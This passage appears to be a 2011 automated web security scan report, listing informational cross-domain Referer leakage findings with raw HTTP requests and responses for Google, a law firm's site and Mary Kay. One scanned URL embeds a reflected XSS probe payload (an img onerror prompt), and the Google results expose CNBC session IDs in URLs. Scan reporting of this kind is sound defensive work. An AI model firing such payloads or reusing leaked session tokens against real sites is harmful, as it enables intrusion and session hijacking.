http://webcache.googleusercontent.com/search?q=cache:em0gqyNNO08J:videoreprints.cnbc.com/cart_remove.action%3Bjsessionid%3D985047FA11137241E01F938A1DBC0957%3Fparms%3DVy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2TDh3OEdKUTFzcHVNQjV4d0dFQUt1Qg%253D%253D%26phrase%3DInvestments%2Bfor%2BHigh%2BNet%2BWorth+site:cnbc.com+JSESSIONID&cd=2&hl=en&ct=clnk&gl=us
http://webcache.googleusercontent.com/search?q=cache:f7VLmaz0zi4J:videoreprints.cnbc.com/cart_add.action%3Bjsessionid%3D0B47155A9D65A891A3246272A37765AB%3Fparms%3DVy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2S2k1S2NoS0pSeFowbVo5SHJOcUVudA%253D%253D%26phrase%3DMuni%2BBonds%253A%2BTime%2Bto%2BBuy%253F%26page%3D0+site:cnbc.com+JSESSIONID&cd=8&hl=en&ct=clnk&gl=us
http://webcache.googleusercontent.com/search?q=cache:xCZvBCIia04J:videoreprints.cnbc.com/cart_remove.action%3Bjsessionid%3D88BAFCA8CD8211717C40DEEB8444A8AC%3Fparms%3DVy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2SXFjd0pIdThwMTJ2TENPcEtyendEVg%253D%253D%26phrase%3DSoft%2BLanding%2Bor%2BHard%2BLanding%2Bfor%2BChina%253F+site:cnbc.com+JSESSIONID&cd=4&hl=en&ct=clnk&gl=us
http://www.youtube.com/results?q=site:cnbc.com+JSESSIONID&um=1&ie=UTF-8&sa=N&hl=en&tab=w1

Request

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:13:56 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Get-Dictionary: /sdch/StnTz5pY.dct
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 102810

<!doctype html> <head> <title>site:cnbc.com JSESSIONID - Google Search</title> <script>window.google={kEI:"tDhmToK0BcfciAKMtYzGCg",getEI:function(a){var b;while(a&&!(a.getAttribute&&(b=a.getAtt
...[SNIP]...
<li class=gbmtc><a onclick=gbar.qs(this) class=gbmt id=gb_36 href="http://www.youtube.com/results?q=site:cnbc.com+JSESSIONID&um=1&ie=UTF-8&sa=N&hl=en&tab=w1" onclick="gbar.logger.il(1,{t:36})">YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://videoreprints.cnbc.com/cart_remove.action;jsessionid=11B292CC4219086DCD47B8876891F233?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2SzFCSUt5TFNSMjNLTGZaQXFDVDBtdg%3D%3D&phrase=Options+Action+Web+Extra" class=l onmousedown="return clk(this,'http://videoreprints.cnbc.com/cart_remove.action;jsessionid=11B292CC4219086DCD47B8876891F233?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2SzFCSUt5TFNSMjNLTGZaQXFDVDBtdg%3D%3D&phrase=Options+Action+Web+Extra','','','','1','','0CBoQFjAA')">Remove - Shopping Cart</a>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:8WxAEA7fJFEJ:videoreprints.cnbc.com/cart_remove.action%3Bjsessionid%3D11B292CC4219086DCD47B8876891F233%3Fparms%3DVy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2SzFCSUt5TFNSMjNLTGZaQXFDVDBtdg%253D%253D%26phrase%3DOptions%2BAction%2BWeb%2BExtra+site:cnbc.com+JSESSIONID&cd=1&hl=en&ct=clnk&gl=us" onmousedown="return clk(this,'http://webcache.googleusercontent.com/search?q=cache:8WxAEA7fJFEJ:videoreprints.cnbc.com/cart_remove.action%3Bjsessionid%3D11B292CC4219086DCD47B8876891F233%3Fparms%3DVy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2SzFCSUt5TFNSMjNLTGZaQXFDVDBtdg%253D%253D%26phrase%3DOptions%2BAction%2BWeb%2BExtra+site:cnbc.com+JSESSIONID&cd=1&hl=en&ct=clnk&gl=us','','','','1','','0CBwQIDAA')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://videoreprints.cnbc.com/cart_remove.action;jsessionid=985047FA11137241E01F938A1DBC0957?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2TDh3OEdKUTFzcHVNQjV4d0dFQUt1Qg%3D%3D&phrase=Investments+for+High+Net+Worth" class=l onmousedown="return clk(this,'http://videoreprints.cnbc.com/cart_remove.action;jsessionid=985047FA11137241E01F938A1DBC0957?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2TDh3OEdKUTFzcHVNQjV4d0dFQUt1Qg%3D%3D&phrase=Investments+for+High+Net+Worth','','','','2','','0CCAQFjAB')">Remove - Shopping Cart</a>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:em0gqyNNO08J:videoreprints.cnbc.com/cart_remove.action%3Bjsessionid%3D985047FA11137241E01F938A1DBC0957%3Fparms%3DVy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2TDh3OEdKUTFzcHVNQjV4d0dFQUt1Qg%253D%253D%26phrase%3DInvestments%2Bfor%2BHigh%2BNet%2BWorth+site:cnbc.com+JSESSIONID&cd=2&hl=en&ct=clnk&gl=us" onmousedown="return clk(this,'http://webcache.googleusercontent.com/search?q=cache:em0gqyNNO08J:videoreprints.cnbc.com/cart_remove.action%3Bjsessionid%3D985047FA11137241E01F938A1DBC0957%3Fparms%3DVy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2TDh3OEdKUTFzcHVNQjV4d0dFQUt1Qg%253D%253D%26phrase%3DInvestments%2Bfor%2BHigh%2BNet%2BWorth+site:cnbc.com+JSESSIONID&cd=2&hl=en&ct=clnk&gl=us','','','','2','','0CCIQIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://videoreprints.cnbc.com/cart_remove.action;jsessionid=B55B909145331242FF6DF4FCC879CCA8?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2TEZzaHhTUVJMMXJBTjlsbHRReGhoNQ%3D%3D&phrase=Fundraiser-in-Chief" class=l onmousedown="return clk(this,'http://videoreprints.cnbc.com/cart_remove.action;jsessionid=B55B909145331242FF6DF4FCC879CCA8?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2TEZzaHhTUVJMMXJBTjlsbHRReGhoNQ%3D%3D&phrase=Fundraiser-in-Chief','','','','3','','0CCYQFjAC')">Remove - Shopping Cart</a>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:SfXHZFTE3k4J:videoreprints.cnbc.com/cart_remove.action%3Bjsessionid%3DB55B909145331242FF6DF4FCC879CCA8%3Fparms%3DVy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2TEZzaHhTUVJMMXJBTjlsbHRReGhoNQ%253D%253D%26phrase%3DFundraiser-in-Chief+site:cnbc.com+JSESSIONID&cd=3&hl=en&ct=clnk&gl=us" onmousedown="return clk(this,'http://webcache.googleusercontent.com/search?q=cache:SfXHZFTE3k4J:videoreprints.cnbc.com/cart_remove.action%3Bjsessionid%3DB55B909145331242FF6DF4FCC879CCA8%3Fparms%3DVy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2TEZzaHhTUVJMMXJBTjlsbHRReGhoNQ%253D%253D%26phrase%3DFundraiser-in-Chief+site:cnbc.com+JSESSIONID&cd=3&hl=en&ct=clnk&gl=us','','','','3','','0CCgQIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://videoreprints.cnbc.com/cart_remove.action;jsessionid=88BAFCA8CD8211717C40DEEB8444A8AC?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2SXFjd0pIdThwMTJ2TENPcEtyendEVg%3D%3D&phrase=Soft+Landing+or+Hard+Landing+for+China%3F" class=l onmousedown="return clk(this,'http://videoreprints.cnbc.com/cart_remove.action;jsessionid=88BAFCA8CD8211717C40DEEB8444A8AC?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2SXFjd0pIdThwMTJ2TENPcEtyendEVg%3D%3D&phrase=Soft+Landing+or+Hard+Landing+for+China%3F','','','','4','','0CCwQFjAD')">Remove - Shopping Cart</a>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:xCZvBCIia04J:videoreprints.cnbc.com/cart_remove.action%3Bjsessionid%3D88BAFCA8CD8211717C40DEEB8444A8AC%3Fparms%3DVy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2SXFjd0pIdThwMTJ2TENPcEtyendEVg%253D%253D%26phrase%3DSoft%2BLanding%2Bor%2BHard%2BLanding%2Bfor%2BChina%253F+site:cnbc.com+JSESSIONID&cd=4&hl=en&ct=clnk&gl=us" onmousedown="return clk(this,'http://webcache.googleusercontent.com/search?q=cache:xCZvBCIia04J:videoreprints.cnbc.com/cart_remove.action%3Bjsessionid%3D88BAFCA8CD8211717C40DEEB8444A8AC%3Fparms%3DVy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2SXFjd0pIdThwMTJ2TENPcEtyendEVg%253D%253D%26phrase%3DSoft%2BLanding%2Bor%2BHard%2BLanding%2Bfor%2BChina%253F+site:cnbc.com+JSESSIONID&cd=4&hl=en&ct=clnk&gl=us','','','','4','','0CC4QIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://videoreprints.cnbc.com/cart_remove.action;jsessionid=F106A5792CA8BDD181F1F225115A4E13?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2THdhZHZIUEtZb1puTmkyTWhYMFhuQQ%3D%3D&phrase=Joint+EU-IMF+Aid+May+Not+Be+All+That+Great%3A+Analyst" class=l onmousedown="return clk(this,'http://videoreprints.cnbc.com/cart_remove.action;jsessionid=F106A5792CA8BDD181F1F225115A4E13?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2THdhZHZIUEtZb1puTmkyTWhYMFhuQQ%3D%3D&phrase=Joint+EU-IMF+Aid+May+Not+Be+All+That+Great%3A+Analyst','','','','5','','0CDIQFjAE')">Remove - Shopping Cart</a>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:X_00EaoXOEwJ:videoreprints.cnbc.com/cart_remove.action%3Bjsessionid%3DF106A5792CA8BDD181F1F225115A4E13%3Fparms%3DVy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2THdhZHZIUEtZb1puTmkyTWhYMFhuQQ%253D%253D%26phrase%3DJoint%2BEU-IMF%2BAid%2BMay%2BNot%2BBe%2BAll%2BThat%2BGreat%253A%2BAnalyst+site:cnbc.com+JSESSIONID&cd=5&hl=en&ct=clnk&gl=us" onmousedown="return clk(this,'http://webcache.googleusercontent.com/search?q=cache:X_00EaoXOEwJ:videoreprints.cnbc.com/cart_remove.action%3Bjsessionid%3DF106A5792CA8BDD181F1F225115A4E13%3Fparms%3DVy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2THdhZHZIUEtZb1puTmkyTWhYMFhuQQ%253D%253D%26phrase%3DJoint%2BEU-IMF%2BAid%2BMay%2BNot%2BBe%2BAll%2BThat%2BGreat%253A%2BAnalyst+site:cnbc.com+JSESSIONID&cd=5&hl=en&ct=clnk&gl=us','','','','5','','0CDQQIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://videoreprints.cnbc.com/cart_remove.action;jsessionid=639562A329F750EF6CECEF52850FF058?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2SXFjd0pIdThwMTJySmQ3L2ZTZzAvVw%3D%3D&phrase=Alcoa+Earnings+Reaction" class=l onmousedown="return clk(this,'http://videoreprints.cnbc.com/cart_remove.action;jsessionid=639562A329F750EF6CECEF52850FF058?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2SXFjd0pIdThwMTJySmQ3L2ZTZzAvVw%3D%3D&phrase=Alcoa+Earnings+Reaction','','','','6','','0CDgQFjAF')">Shopping Cart</a>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:FdhCl3P1wEsJ:videoreprints.cnbc.com/cart_remove.action%3Bjsessionid%3D639562A329F750EF6CECEF52850FF058%3Fparms%3DVy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2SXFjd0pIdThwMTJySmQ3L2ZTZzAvVw%253D%253D%26phrase%3DAlcoa%2BEarnings%2BReaction+site:cnbc.com+JSESSIONID&cd=6&hl=en&ct=clnk&gl=us" onmousedown="return clk(this,'http://webcache.googleusercontent.com/search?q=cache:FdhCl3P1wEsJ:videoreprints.cnbc.com/cart_remove.action%3Bjsessionid%3D639562A329F750EF6CECEF52850FF058%3Fparms%3DVy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2SXFjd0pIdThwMTJySmQ3L2ZTZzAvVw%253D%253D%26phrase%3DAlcoa%2BEarnings%2BReaction+site:cnbc.com+JSESSIONID&cd=6&hl=en&ct=clnk&gl=us','','','','6','','0CDoQIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://videoreprints.cnbc.com/cart_remove.action;jsessionid=DED5E23C761652B8ED8438990C240549?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2SzFCSUt5TFNSMjNORFcrYURhWDhlZg%3D%3D&phrase=Talking+Numbers%3A+Cashing+in+on+the+Consumer" class=l onmousedown="return clk(this,'http://videoreprints.cnbc.com/cart_remove.action;jsessionid=DED5E23C761652B8ED8438990C240549?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2SzFCSUt5TFNSMjNORFcrYURhWDhlZg%3D%3D&phrase=Talking+Numbers%3A+Cashing+in+on+the+Consumer','','','','7','','0CD4QFjAG')">Remove - Shopping Cart</a>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:MXNjqSbiM0oJ:videoreprints.cnbc.com/cart_remove.action%3Bjsessionid%3DDED5E23C761652B8ED8438990C240549%3Fparms%3DVy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2SzFCSUt5TFNSMjNORFcrYURhWDhlZg%253D%253D%26phrase%3DTalking%2BNumbers%253A%2BCashing%2Bin%2Bon%2Bthe%2BConsumer+site:cnbc.com+JSESSIONID&cd=7&hl=en&ct=clnk&gl=us" onmousedown="return clk(this,'http://webcache.googleusercontent.com/search?q=cache:MXNjqSbiM0oJ:videoreprints.cnbc.com/cart_remove.action%3Bjsessionid%3DDED5E23C761652B8ED8438990C240549%3Fparms%3DVy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2SzFCSUt5TFNSMjNORFcrYURhWDhlZg%253D%253D%26phrase%3DTalking%2BNumbers%253A%2BCashing%2Bin%2Bon%2Bthe%2BConsumer+site:cnbc.com+JSESSIONID&cd=7&hl=en&ct=clnk&gl=us','','','','7','','0CEAQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://videoreprints.cnbc.com/cart_add.action;jsessionid=0B47155A9D65A891A3246272A37765AB?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2S2k1S2NoS0pSeFowbVo5SHJOcUVudA%3D%3D&phrase=Muni+Bonds%3A+Time+to+Buy%3F&page=0" class=l onmousedown="return clk(this,'http://videoreprints.cnbc.com/cart_add.action;jsessionid=0B47155A9D65A891A3246272A37765AB?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2S2k1S2NoS0pSeFowbVo5SHJOcUVudA%3D%3D&phrase=Muni+Bonds%3A+Time+to+Buy%3F&page=0','','','','8','','0CEQQFjAH')">Add to Cart - Shopping Cart</a>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:f7VLmaz0zi4J:videoreprints.cnbc.com/cart_add.action%3Bjsessionid%3D0B47155A9D65A891A3246272A37765AB%3Fparms%3DVy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2S2k1S2NoS0pSeFowbVo5SHJOcUVudA%253D%253D%26phrase%3DMuni%2BBonds%253A%2BTime%2Bto%2BBuy%253F%26page%3D0+site:cnbc.com+JSESSIONID&cd=8&hl=en&ct=clnk&gl=us" onmousedown="return clk(this,'http://webcache.googleusercontent.com/search?q=cache:f7VLmaz0zi4J:videoreprints.cnbc.com/cart_add.action%3Bjsessionid%3D0B47155A9D65A891A3246272A37765AB%3Fparms%3DVy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2S2k1S2NoS0pSeFowbVo5SHJOcUVudA%253D%253D%26phrase%3DMuni%2BBonds%253A%2BTime%2Bto%2BBuy%253F%26page%3D0+site:cnbc.com+JSESSIONID&cd=8&hl=en&ct=clnk&gl=us','','','','8','','0CEYQIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://videoreprints.cnbc.com/cart_add.action;jsessionid=93C40ADFE94CC07D57F86DD9E23EF04B?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2S2k1S2NoS0pSeFovUEJVWjFZZG42YQ%3D%3D&phrase=Eye+on+Europe's+Economy&page=1" class=l onmousedown="return clk(this,'http://videoreprints.cnbc.com/cart_add.action;jsessionid=93C40ADFE94CC07D57F86DD9E23EF04B?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2S2k1S2NoS0pSeFovUEJVWjFZZG42YQ%3D%3D&phrase=Eye+on+Europe\'s+Economy&page=1','','','','9','','0CEoQFjAI')">Add to Cart - Shopping Cart</a>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:KAqXj9MU2ogJ:videoreprints.cnbc.com/cart_add.action%3Bjsessionid%3D93C40ADFE94CC07D57F86DD9E23EF04B%3Fparms%3DVy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2S2k1S2NoS0pSeFovUEJVWjFZZG42YQ%253D%253D%26phrase%3DEye%2Bon%2BEurope's%2BEconomy%26page%3D1+site:cnbc.com+JSESSIONID&cd=9&hl=en&ct=clnk&gl=us" onmousedown="return clk(this,'http://webcache.googleusercontent.com/search?q=cache:KAqXj9MU2ogJ:videoreprints.cnbc.com/cart_add.action%3Bjsessionid%3D93C40ADFE94CC07D57F86DD9E23EF04B%3Fparms%3DVy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2S2k1S2NoS0pSeFovUEJVWjFZZG42YQ%253D%253D%26phrase%3DEye%2Bon%2BEurope\'s%2BEconomy%26page%3D1+site:cnbc.com+JSESSIONID&cd=9&hl=en&ct=clnk&gl=us','','','','9','','0CEwQIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://videoreprints.cnbc.com/search.action;jsessionid=B2F5063C1050C7893BD8840513A5ABB2?phrase=Commodity+Price+Check" class=l onmousedown="return clk(this,this.href,'','','','10','','0CFAQFjAJ')">Clips about Commodity Price Check - Video Reprints - CNBC.com</a>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:681MsvVQ1sYJ:videoreprints.cnbc.com/search.action%3Bjsessionid%3DB2F5063C1050C7893BD8840513A5ABB2%3Fphrase%3DCommodity%2BPrice%2BCheck+site:cnbc.com+JSESSIONID&cd=10&hl=en&ct=clnk&gl=us" onmousedown="return clk(this,'http://webcache.googleusercontent.com/search?q=cache:681MsvVQ1sYJ:videoreprints.cnbc.com/search.action%3Bjsessionid%3DB2F5063C1050C7893BD8840513A5ABB2%3Fphrase%3DCommodity%2BPrice%2BCheck+site:cnbc.com+JSESSIONID&cd=10&hl=en&ct=clnk&gl=us','','','','10','','0CFIQIDAJ')">Cached</a>
...[SNIP]...

19.101. http://www.googleadservices.com/pagead/conversion/1071435827/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.googleadservices.com
Path:	/pagead/conversion/1071435827/

Issue detail

The page was loaded from a URL containing a query string:

http://www.googleadservices.com/pagead/conversion/1071435827/?random=1315341856992&cv=6&fst=1315341856992&num=1&fmt=1&value=0&label=KhpeCOWsqgEQs6Dz_gM&bg=666666&hl=en&guid=ON&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_his=3&u_tz=-300&u_java=true&u_nplug=20&u_nmime=100&ref=http%3A//www.netsuite.com/portal/home.shtml&url=http%3A//www.netsuite.com/portal/products/netsuite/financials/main.shtml

The response contains the following link to another domain:

https://services.google.com/sitestats/en_US.html?cid=1071435827

Request

GET /pagead/conversion/1071435827/?random=1315341856992&cv=6&fst=1315341856992&num=1&fmt=1&value=0&label=KhpeCOWsqgEQs6Dz_gM&bg=666666&hl=en&guid=ON&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_his=3&u_tz=-300&u_java=true&u_nplug=20&u_nmime=100&ref=http%3A//www.netsuite.com/portal/home.shtml&url=http%3A//www.netsuite.com/portal/products/netsuite/financials/main.shtml HTTP/1.1
Host: www.googleadservices.com
Proxy-Connection: keep-alive
Referer: http://www.netsuite.com/portal/products/netsuite/financials/main.shtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Conversion=CoQBQ2xkUnY1VHhtVHNOeHBiT0lBcVcyMklrUHo4VHA4QUgzbGNTakdMbnBnQWNRQXlnSVVQSGF4NWdCWU1tZV9vYklvX3dhb0FHem9QUC1BOGdCQWFvRUlrX1FYYVQ2c3ZSajdxUEFDRGpiSUJBY3NoQlI1OFNMaHJJalpNWmJ2blloc044EhMIzKi_wPiIqwIVIEKDCh1GdcvMGAAgvsDK96bSyISEAUgB

Response

HTTP/1.1 302 Found
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Set-Cookie: PREF=; Max-Age=0; Path=/; Version=1; Domain=.www.googleadservices.com
Date: Tue, 06 Sep 2011 15:44:18 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Location: http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1071435827/?random=1315341856992&cv=6&fst=1315341856992&num=1&fmt=1&value=0&label=KhpeCOWsqgEQs6Dz_gM&bg=666666&hl=en&guid=ON&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_his=3&u_tz=-300&u_java=true&u_nplug=20&u_nmime=100&ref=http%3A//www.netsuite.com/portal/home.shtml&url=http%3A//www.netsuite.com/portal/products/netsuite/financials/main.shtml&ctc_id=CAEVAQAAAB0BAAAA&ct_cookie_present=true
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Server: cafe
Content-Length: 381
X-XSS-Protection: 1; mode=block

<html><body bgcolor="#666666" link="#FFFFFF" alink="#FFFFFF" vlink="#FFFFFF" leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><center><font style="font-size:11px" face="arial,sans-serif" color="#FFFFFF">Google Site Stats - <a href="https://services.google.com/sitestats/en_US.html?cid=1071435827" target="_blank">learn more</a>
...[SNIP]...

19.102. http://www.harbottle.com/hnl/pages/hnl.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.harbottle.com
Path:	/hnl/pages/hnl.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.harbottle.com/hnl/pages/hnl.php?gclid=

The response contains the following link to another domain:

http://www.google-analytics.com/urchin.js

Request

GET /hnl/pages/hnl.php?gclid= HTTP/1.1
Host: www.harbottle.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Harbottle+%26+Lewis
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:43:17 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Connection: close
Content-Type: text/html
Content-Length: 13666

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<base href=http:/
...[SNIP]...
</script>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

19.103. http://www.harbottle.com/hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(document.location)%3E9d536909165a5febf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.harbottle.com
Path:	/hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(document.location)%3E9d536909165a5febf

Issue detail

The page was loaded from a URL containing a query string:

http://www.harbottle.com/hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(document.location)%3E9d536909165a5febf?search=xss

The response contains the following link to another domain:

http://www.google-analytics.com/urchin.js

Request

GET /hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(document.location)%3E9d536909165a5febf?search=xss HTTP/1.1
Host: www.harbottle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: __utma=7854507.756042197.1315345754.1315345754.1315345754.1; __utmb=7854507; __utmc=7854507; __utmz=7854507.1315345754.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:49:29 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Content-Length: 5175
Connection: close
Content-Type: text/html

<body margin=0>
<div id="blanket" style="display:none;"></div>
<meta name="section" content="" />
<div id="main">
<div id="header">
<div class="w-left">
<a href="pages/
...[SNIP]...
</script>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

19.104. http://www.marykay.com/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marykay.com
Path:	/default.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.marykay.com/default.aspx?pid=mk

The response contains the following links to other domains:

http://applications.marykayintouch.com/
http://www.facebook.com/MaryKay
http://www.marykayfoundation.org/
http://www.microsoft.com/windows/Internet-explorer/default.aspx
http://www.mozilla.com/en-US/firefox/ie.html
http://www.youtube.com/marykay

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Tue, 06 Sep 2011 16:45:46 GMT
Content-Type: text/html; charset=utf-8
Content-Language: en
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: Subsidiary=US; path=/
Set-Cookie: PreviousMoniker=; path=/
Set-Cookie: Moniker=; path=/
Set-Cookie: ConsultantContactID=-9223372036854775808; path=/
Set-Cookie: TLTHID=A79DE10345855E54FDA05590CB54614B; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Vary: Accept-Encoding
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:46 GMT; path=/
Content-Length: 36830

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 TRANSITIONAL//EN" >
<html>
<head><meta name="title" content="Mary Kay... Find your way to beautiful!" /><link id="Link1" rel="image_src" href="http://w
...[SNIP]...
<li class="ANM-Leaf"><A class="ANM-Link" target="_blank" href="http://www.marykayfoundation.org">The Mary Kay Foundation</A>
...[SNIP]...
